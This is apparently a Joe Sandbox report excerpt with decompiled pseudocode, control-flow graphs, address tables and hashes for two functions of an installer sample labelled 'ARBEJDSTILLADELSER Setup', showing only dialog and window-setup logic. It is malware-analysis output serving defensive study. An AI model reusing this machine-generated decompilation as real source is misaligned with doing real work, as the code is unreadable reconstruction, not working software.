40417c-404180 287->288 289 404182-404188 288->289 290 40419f-4041b3 DestroyWindow 288->290 289->218 291 40418e-404194 289->291 290->223 292 4041b9-4041e6 CreateDialogParamA 290->292 291->219 293 40419a 291->293 292->223 294 4041ec-404243 call 4042d4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 292->294 293->218 294->218 299 404245-404258 ShowWindow call 404320 294->299 301 40425d 299->301 301->223
                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                              			E00403DDA(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				signed int _t36;
				struct HWND__* _t46;
				signed int _t65;
				struct HWND__* _t71;
				signed int _t84;
				struct HWND__* _t89;
				signed int _t97;
				int _t101;
				signed int _t115;
				int _t116;
				int _t120;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				intOrPtr _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t144;

				_t128 = _a8;
				if(_t128 == 0x110 || _t128 == 0x408) {
					_t32 = _a12;
					_t125 = _a4;
					__eflags = _t128 - 0x110;
					 *0x42a878 = _t32;
					if(_t128 == 0x110) {
						 *0x42f428 = _t125;
						 *0x42a88c = GetDlgItem(_t125, 1);
						_t89 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429858 = _t89;
						E004042D4(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42ec08); // executed
						 *0x42ebec = E0040140B(4);
						_t32 = 1;
						__eflags = 1;
						 *0x42a878 = 1;
					}
					_t122 =  *0x40a1dc; // 0x0
					_t134 = 0;
					_t131 = (_t122 << 6) +  *0x42f440;
					__eflags = _t122;
					if(_t122 < 0) {
						L36:
						E00404320(0x40b);
						while(1) {
							_t34 =  *0x42a878; // 0x1
							 *0x40a1dc =  *0x40a1dc + _t34;
							_t131 = _t131 + (_t34 << 6);
							_t36 =  *0x40a1dc; // 0x0
							__eflags = _t36 -  *0x42f444;
							if(_t36 ==  *0x42f444) {
								E0040140B(1);
							}
							__eflags =  *0x42ebec - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x42f444; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t115 =  *(_t131 + 0x14);
							E004062EA(_t115, _t125, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D4(_t125);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D4(_t125);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D4(_t125);
							_t46 = GetDlgItem(_t125, 3);
							__eflags =  *0x42f4ac - _t134;
							_v28 = _t46;
							if( *0x42f4ac != _t134) {
								_t115 = _t115 & 0x0000fefd | 0x00000004;
								__eflags = _t115;
							}
							ShowWindow(_t46, _t115 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x34), _t115 & 0x00000100); // executed
							E004042F6(_t115 & 0x00000002);
							_t116 = _t115 & 0x00000004;
							EnableWindow( *0x429858, _t116);
							__eflags = _t116 - _t134;
							if(_t116 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x3c), 0xf4, _t134, 1);
							__eflags =  *0x42f4ac - _t134;
							if( *0x42f4ac == _t134) {
								_push( *0x42a88c);
							} else {
								SendMessageA(_t125, 0x401, 2, _t134);
								_push( *0x429858);
							}
							E00404309();
							E00406257(0x42a890, E00403DBB());
							E004062EA(0x42a890, _t125, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t125, 0x42a890); // executed
							_push(_t134);
							_t65 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x42ebf8); // executed
									 *0x42a068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L60;
									}
									_t71 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t125,  *( *(_t131 + 4) * 4 + "?D@"), _t131); // executed
									__eflags = _t71 - _t134;
									 *0x42ebf8 = _t71;
									if(_t71 == _t134) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D4(_t71);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t125, _t135 + 0x10);
									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x42ebec - _t134; // 0x0
									if(__eflags != 0) {
										goto L63;
									}
									ShowWindow( *0x42ebf8, 8); // executed
									E00404320(0x405);
									goto L60;
								}
								__eflags =  *0x42f4ac - _t134;
								if( *0x42f4ac != _t134) {
									goto L63;
								}
								__eflags =  *0x42f4a0 - _t134;
								if( *0x42f4a0 != _t134) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x42ebf8);
						 *0x42f428 = _t134;
						EndDialog(_t125,  *0x429c60);
						goto L60;
					} else {
						__eflags = _t32 - 1;
						if(_t32 != 1) {
							L35:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t84 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L35;
						}
						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
						__eflags =  *0x42ebec - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t134 = 0;
					if(_t128 == 0x47) {
						SetWindowPos( *0x42a870, _t125, 0, 0, 0, 0, 0x13);
					}
					_t120 = _a12;
					if(_t128 != 5) {
						L8:
						if(_t128 != 0x40d) {
							__eflags = _t128 - 0x11;
							if(_t128 != 0x11) {
								__eflags = _t128 - 0x111;
								if(_t128 != 0x111) {
									L28:
									return E0040433B(_a8, _t120, _a16);
								}
								_t133 = _t120 & 0x0000ffff;
								_t126 = GetDlgItem(_t125, _t133);
								__eflags = _t126 - _t134;
								if(_t126 == _t134) {
									L15:
									__eflags = _t133 - 1;
									if(_t133 != 1) {
										__eflags = _t133 - 3;
										if(_t133 != 3) {
											_t127 = 2;
											__eflags = _t133 - _t127;
											if(_t133 != _t127) {
												L27:
												SendMessageA( *0x42ebf8, 0x111, _t120, _a16);
												goto L28;
											}
											__eflags =  *0x42f4ac - _t134;
											if( *0x42f4ac == _t134) {
												_t97 = E0040140B(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L28;
												}
												 *0x429c60 = 1;
												L23:
												_push(0x78);
												L24:
												E004042AD();
												goto L28;
											}
											E0040140B(_t127);
											 *0x429c60 = _t127;
											goto L23;
										}
										__eflags =  *0x40a1dc - _t134; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t133);
									goto L24;
								}
								SendMessageA(_t126, 0xf3, _t134, _t134);
								_t101 = IsWindowEnabled(_t126);
								__eflags = _t101;
								if(_t101 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongA(_t125, _t134, _t134);
							return 1;
						}
						DestroyWindow( *0x42ebf8);
						 *0x42ebf8 = _t120;
						L60:
						if( *0x42b890 == _t134) {
							_t144 =  *0x42ebf8 - _t134; // 0x5001c
							if(_t144 != 0) {
								ShowWindow(_t125, 0xa); // executed
								 *0x42b890 = 1;
							}
						}
						goto L63;
					}
					asm("sbb eax, eax");
					ShowWindow( *0x42a870,  ~(_t120 - 1) & 0x00000005);
					if(_t120 != 2 || (GetWindowLongA(_t125, 0xfffffff0) & 0x21010000) != 0x1000000) {
						goto L28;
					} else {
						ShowWindow(_t125, 4);
						goto L8;
					}
				}
			}
































                                                                                                                                                                              0x00403de5
                                                                                                                                                                              0x00403dec
                                                                                                                                                                              0x00403f53
                                                                                                                                                                              0x00403f57
                                                                                                                                                                              0x00403f5b
                                                                                                                                                                              0x00403f5d
                                                                                                                                                                              0x00403f62
                                                                                                                                                                              0x00403f6d
                                                                                                                                                                              0x00403f78
                                                                                                                                                                              0x00403f7d
                                                                                                                                                                              0x00403f7f
                                                                                                                                                                              0x00403f81
                                                                                                                                                                              0x00403f84
                                                                                                                                                                              0x00403f89
                                                                                                                                                                              0x00403f97
                                                                                                                                                                              0x00403fa4
                                                                                                                                                                              0x00403fab
                                                                                                                                                                              0x00403fab
                                                                                                                                                                              0x00403fac
                                                                                                                                                                              0x00403fac
                                                                                                                                                                              0x00403fb1
                                                                                                                                                                              0x00403fb7
                                                                                                                                                                              0x00403fbe
                                                                                                                                                                              0x00403fc4
                                                                                                                                                                              0x00403fc6
                                                                                                                                                                              0x00404006
                                                                                                                                                                              0x0040400b
                                                                                                                                                                              0x00404010
                                                                                                                                                                              0x00404010
                                                                                                                                                                              0x00404015
                                                                                                                                                                              0x0040401e
                                                                                                                                                                              0x00404020
                                                                                                                                                                              0x00404025
                                                                                                                                                                              0x0040402b
                                                                                                                                                                              0x0040402f
                                                                                                                                                                              0x0040402f
                                                                                                                                                                              0x00404034
                                                                                                                                                                              0x0040403a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404045
                                                                                                                                                                              0x0040404b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404054
                                                                                                                                                                              0x0040405c
                                                                                                                                                                              0x00404061
                                                                                                                                                                              0x00404064
                                                                                                                                                                              0x0040406a
                                                                                                                                                                              0x0040406f
                                                                                                                                                                              0x00404072
                                                                                                                                                                              0x00404078
                                                                                                                                                                              0x0040407d
                                                                                                                                                                              0x00404080
                                                                                                                                                                              0x00404086
                                                                                                                                                                              0x0040408e
                                                                                                                                                                              0x00404094
                                                                                                                                                                              0x0040409a
                                                                                                                                                                              0x0040409e
                                                                                                                                                                              0x004040a5
                                                                                                                                                                              0x004040a5
                                                                                                                                                                              0x004040a5
                                                                                                                                                                              0x004040af
                                                                                                                                                                              0x004040c1
                                                                                                                                                                              0x004040cd
                                                                                                                                                                              0x004040d2
                                                                                                                                                                              0x004040dc
                                                                                                                                                                              0x004040e2
                                                                                                                                                                              0x004040e4
                                                                                                                                                                              0x004040e9
                                                                                                                                                                              0x004040e6
                                                                                                                                                                              0x004040e6
                                                                                                                                                                              0x004040e6
                                                                                                                                                                              0x004040f9
                                                                                                                                                                              0x00404111
                                                                                                                                                                              0x00404113
                                                                                                                                                                              0x00404119
                                                                                                                                                                              0x0040412e
                                                                                                                                                                              0x0040411b
                                                                                                                                                                              0x00404124
                                                                                                                                                                              0x00404126
                                                                                                                                                                              0x00404126
                                                                                                                                                                              0x00404134
                                                                                                                                                                              0x00404145
                                                                                                                                                                              0x00404156
                                                                                                                                                                              0x0040415d
                                                                                                                                                                              0x00404163
                                                                                                                                                                              0x00404167
                                                                                                                                                                              0x0040416c
                                                                                                                                                                              0x0040416e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404174
                                                                                                                                                                              0x00404174
                                                                                                                                                                              0x00404176
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040417c
                                                                                                                                                                              0x00404180
                                                                                                                                                                              0x004041a5
                                                                                                                                                                              0x004041ab
                                                                                                                                                                              0x004041b1
                                                                                                                                                                              0x004041b3
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004041d9
                                                                                                                                                                              0x004041df
                                                                                                                                                                              0x004041e1
                                                                                                                                                                              0x004041e6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004041ec
                                                                                                                                                                              0x004041ef
                                                                                                                                                                              0x004041f2
                                                                                                                                                                              0x00404209
                                                                                                                                                                              0x00404215
                                                                                                                                                                              0x0040422e
                                                                                                                                                                              0x00404234
                                                                                                                                                                              0x00404238
                                                                                                                                                                              0x0040423d
                                                                                                                                                                              0x00404243
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040424d
                                                                                                                                                                              0x00404258
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404258
                                                                                                                                                                              0x00404182
                                                                                                                                                                              0x00404188
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040418e
                                                                                                                                                                              0x00404194
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040419a
                                                                                                                                                                              0x0040416e
                                                                                                                                                                              0x00404265
                                                                                                                                                                              0x00404271
                                                                                                                                                                              0x00404278
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403fc8
                                                                                                                                                                              0x00403fc8
                                                                                                                                                                              0x00403fcb
                                                                                                                                                                              0x00403ffe
                                                                                                                                                                              0x00403ffe
                                                                                                                                                                              0x00404000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404000
                                                                                                                                                                              0x00403fcd
                                                                                                                                                                              0x00403fd1
                                                                                                                                                                              0x00403fd6
                                                                                                                                                                              0x00403fd8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403fe8
                                                                                                                                                                              0x00403ff0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403ff6
                                                                                                                                                                              0x00403dfe
                                                                                                                                                                              0x00403dfe
                                                                                                                                                                              0x00403e02
                                                                                                                                                                              0x00403e07
                                                                                                                                                                              0x00403e16
                                                                                                                                                                              0x00403e16
                                                                                                                                                                              0x00403e1c
                                                                                                                                                                              0x00403e23
                                                                                                                                                                              0x00403e67
                                                                                                                                                                              0x00403e6d
                                                                                                                                                                              0x00403e86
                                                                                                                                                                              0x00403e89
                                                                                                                                                                              0x00403e9c
                                                                                                                                                                              0x00403ea2
                                                                                                                                                                              0x00403f40
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403f49
                                                                                                                                                                              0x00403ea8
                                                                                                                                                                              0x00403eb3
                                                                                                                                                                              0x00403eb5
                                                                                                                                                                              0x00403eb7
                                                                                                                                                                              0x00403ed6
                                                                                                                                                                              0x00403ed6
                                                                                                                                                                              0x00403ed9
                                                                                                                                                                              0x00403ede
                                                                                                                                                                              0x00403ee1
                                                                                                                                                                              0x00403ef1
                                                                                                                                                                              0x00403ef2
                                                                                                                                                                              0x00403ef4
                                                                                                                                                                              0x00403f2a
                                                                                                                                                                              0x00403f3a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403f3a
                                                                                                                                                                              0x00403ef6
                                                                                                                                                                              0x00403efc
                                                                                                                                                                              0x00403f15
                                                                                                                                                                              0x00403f1a
                                                                                                                                                                              0x00403f1c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403f1e
                                                                                                                                                                              0x00403f0a
                                                                                                                                                                              0x00403f0a
                                                                                                                                                                              0x00403f0c
                                                                                                                                                                              0x00403f0c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403f0c
                                                                                                                                                                              0x00403eff
                                                                                                                                                                              0x00403f04
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403f04
                                                                                                                                                                              0x00403ee3
                                                                                                                                                                              0x00403ee9
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403eeb
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403eeb
                                                                                                                                                                              0x00403edb
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403edb
                                                                                                                                                                              0x00403ec1
                                                                                                                                                                              0x00403ec8
                                                                                                                                                                              0x00403ece
                                                                                                                                                                              0x00403ed0
                                                                                                                                                                              0x004042a1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004042a1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403ed0
                                                                                                                                                                              0x00403e8e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403e96
                                                                                                                                                                              0x00403e75
                                                                                                                                                                              0x00403e7b
                                                                                                                                                                              0x0040427e
                                                                                                                                                                              0x00404284
                                                                                                                                                                              0x00404286
                                                                                                                                                                              0x0040428c
                                                                                                                                                                              0x00404291
                                                                                                                                                                              0x00404297
                                                                                                                                                                              0x00404297
                                                                                                                                                                              0x0040428c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404284
                                                                                                                                                                              0x00403e2a
                                                                                                                                                                              0x00403e36
                                                                                                                                                                              0x00403e3f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403e5e
                                                                                                                                                                              0x00403e61
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403e61
                                                                                                                                                                              0x00403e3f

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E16
                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403E36
                                                                                                                                                                              • GetWindowLongA.USER32 ref: 00403E48
                                                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00403E61
                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403E75
                                                                                                                                                                              • SetWindowLongA.USER32 ref: 00403E8E
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00403EAD
                                                                                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EC1
                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403EC8
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00403F73
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00403F7D
                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403F97
                                                                                                                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE8
                                                                                                                                                                              • GetDlgItem.USER32 ref: 0040408E
                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 004040AF
                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040C1
                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 004040DC
                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F2
                                                                                                                                                                              • EnableMenuItem.USER32 ref: 004040F9
                                                                                                                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00404111
                                                                                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404124
                                                                                                                                                                              • lstrlenA.KERNEL32(ARBEJDSTILLADELSER Setup: Installing,?,ARBEJDSTILLADELSER Setup: Installing,00000000), ref: 0040414E
                                                                                                                                                                              • SetWindowTextA.USER32(?,ARBEJDSTILLADELSER Setup: Installing), ref: 0040415D
                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404291
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                                                                                                                                              • String ID: ARBEJDSTILLADELSER Setup: Installing
                                                                                                                                                                              • API String ID: 3618520773-1892138075
                                                                                                                                                                              • Opcode ID: 127d2bede9c928d446a527d2bae20013705ae04109f31a2289bd5e7c7bb7a3e0
                                                                                                                                                                              • Instruction ID: f21371ea752dfce5ee3d4a80c6152a791402a2454a60405a922b397e1036299a
                                                                                                                                                                              • Opcode Fuzzy Hash: 127d2bede9c928d446a527d2bae20013705ae04109f31a2289bd5e7c7bb7a3e0
                                                                                                                                                                              • Instruction Fuzzy Hash: C1C1E5B1A00205AFDB207F62ED45E2B3A78EB85745F41053EF641B51F0CB799852DB2D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Function 00403A3D Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215stringregistryCOMMON
                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 302 403a3d-403a55 call 406663 305 403a57-403a67 call 4061b5 302->305 306 403a69-403a9a call 40613e 302->306 315 403abd-403ae6 call 403d02 call 405cd7 305->315 311 403ab2-403ab8 lstrcatA 306->311 312 403a9c-403aad call 40613e 306->312 311->315 312->311 320 403aec-403af1 315->320 321 403b6d-403b75 call 405cd7 315->321 320->321 322 403af3-403b17 call 40613e 320->322 327 403b83-403ba8 LoadImageA 321->327 328 403b77-403b7e call 4062ea 321->328 322->321 329 403b19-403b1b 322->329 331 403c29-403c31 call 40140b 327->331 332 403baa-403bda RegisterClassA 327->332 328->327 333 403b2c-403b38 lstrlenA 329->333 334 403b1d-403b2a call 405c14 329->334 346 403c33-403c36 331->346 347 403c3b-403c46 call 403d02 331->347 335 403be0-403c24 SystemParametersInfoA CreateWindowExA 332->335 336 403cf8 332->336 340 403b60-403b68 call 405be9 call 406257 333->340 341 403b3a-403b48 lstrcmpiA 333->341 334->333 335->331 339 403cfa-403d01 336->339 340->321 341->340 345 403b4a-403b54 GetFileAttributesA 341->345 350 403b56-403b58 345->350 351 403b5a-403b5b call 405c30 345->351 346->339 355 403c4c-403c66 ShowWindow call 4065f5 347->355 356 403ccf-403cd0 call 40544a 347->356 350->340 350->351 351->340 363 403c72-403c84 GetClassInfoA 355->363 364 403c68-403c6d call 4065f5 355->364 359 403cd5-403cd7 356->359 361 403cf1-403cf3 call 40140b 359->361 362 403cd9-403cdf 359->362 361->336 362->346 365 403ce5-403cec call 40140b 362->365 368 403c86-403c96 GetClassInfoA RegisterClassA 363->368 369 403c9c-403cbf DialogBoxParamA call 40140b 363->369 364->363 365->346 368->369 373 403cc4-403ccd call 40398d 369->373 373->339
                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                              			E00403A3D(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f430;
				_t17 = E00406663(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a890;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E0040613E(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a890, 0);
					__eflags =  *0x42a890; // 0x41
					if(__eflags == 0) {
						E0040613E(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a890, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061B5("1033",  *_t17() & 0x0000ffff);
				}
				E00403D02(_t71, _t84);
				_t80 = "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens";
				 *0x42f4a0 =  *0x42f438 & 0x00000020;
				 *0x42f4bc = 0x10000;
				if(E00405CD7(_t84, "C:\\Users\\hardz\\Pictures\\Cellekammeraten\\PRVEBALLONS\\Omstigningens") != 0) {
					L16:
					if(E00405CD7(_t92, _t80) == 0) {
						E004062EA(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
					}
					_t25 = LoadImageA( *0x42f420, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42ec08 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D02(_t71, __eflags);
							__eflags =  *0x42f4c0;
							if( *0x42f4c0 != 0) {
								_t28 = E0040544A(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ebec; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a870, 5); // executed
							_t34 = E004065F5("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065F5("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebc0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebc0);
								 *0x42ebe4 = _t81;
								RegisterClassA(0x42ebc0);
							}
							_t36 =  *0x42ec00; // 0x0
							_t39 = DialogBoxParamA( *0x42f420, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DDA, 0); // executed
							E0040398D(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f420;
						 *0x42ebc4 = E00401000;
						 *0x42ebd0 =  *0x42f420;
						 *0x42ebd4 = _t25;
						 *0x42ebe4 = 0x40a1f4;
						if(RegisterClassA(0x42ebc0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a870 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f420, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3c0;
					E0040613E(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f458, 0x42e3c0, 0);
					_t57 =  *0x42e3c0; // 0x45
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3c1;
						 *((char*)(E00405C14(0x42e3c1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406257(_t80, E00405BE9(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C30(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                                                                                                                              0x00403a43
                                                                                                                                                                              0x00403a4c
                                                                                                                                                                              0x00403a53
                                                                                                                                                                              0x00403a55
                                                                                                                                                                              0x00403a69
                                                                                                                                                                              0x00403a7b
                                                                                                                                                                              0x00403a82
                                                                                                                                                                              0x00403a89
                                                                                                                                                                              0x00403a8f
                                                                                                                                                                              0x00403a94
                                                                                                                                                                              0x00403a9a
                                                                                                                                                                              0x00403aad
                                                                                                                                                                              0x00403aad
                                                                                                                                                                              0x00403ab8
                                                                                                                                                                              0x00403a57
                                                                                                                                                                              0x00403a62
                                                                                                                                                                              0x00403a62
                                                                                                                                                                              0x00403abd
                                                                                                                                                                              0x00403ac7
                                                                                                                                                                              0x00403ad0
                                                                                                                                                                              0x00403ad5
                                                                                                                                                                              0x00403ae6
                                                                                                                                                                              0x00403b6d
                                                                                                                                                                              0x00403b75
                                                                                                                                                                              0x00403b7e
                                                                                                                                                                              0x00403b7e
                                                                                                                                                                              0x00403b94
                                                                                                                                                                              0x00403b9a
                                                                                                                                                                              0x00403ba8
                                                                                                                                                                              0x00403c29
                                                                                                                                                                              0x00403c31
                                                                                                                                                                              0x00403c3b
                                                                                                                                                                              0x00403c40
                                                                                                                                                                              0x00403c46
                                                                                                                                                                              0x00403cd0
                                                                                                                                                                              0x00403cd5
                                                                                                                                                                              0x00403cd7
                                                                                                                                                                              0x00403cf3
                                                                                                                                                                              0x00000000
